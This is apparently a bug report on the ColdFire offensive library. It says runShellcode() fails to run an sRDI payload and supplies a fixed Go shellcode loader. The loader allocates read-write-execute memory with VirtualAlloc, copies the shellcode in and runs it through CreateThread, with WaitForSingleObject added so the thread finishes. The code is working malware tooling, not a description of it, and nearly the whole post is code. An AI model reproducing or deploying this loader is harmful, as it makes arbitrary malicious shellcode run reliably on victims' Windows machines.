Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.
Looking at the source for the function, it appears the issue lies with CreateThread being called without WaitForSingleObject afterwards. I added the WaitForSingleObject API call and tested the payload, and it seemed to fix the issue.
```go
package main

import (
	"syscall"
	"unsafe"
)

// ColdFire implementation, with WaitForSingleObject added after CreateThread
func runShellcode(shellcode []byte) {
	var bg_run uintptr = 0x00
	kernel32 := syscall.MustLoadDLL("kernel32.dll")
	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
	procCreateThread := kernel32.MustFindProc("CreateThread")
	waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
	// MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
	ptr := (*[990000]byte)(unsafe.Pointer(addr))
	for i, value := range shellcode {
		ptr[i] = value
	}
	threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
	// Block until the new thread finishes; without this the caller can return
	// (and the process exit) before the thread has had a chance to run.
	waitForSingleObject.Call(threadHandle, uintptr(^uint(0))) // INFINITE
}
```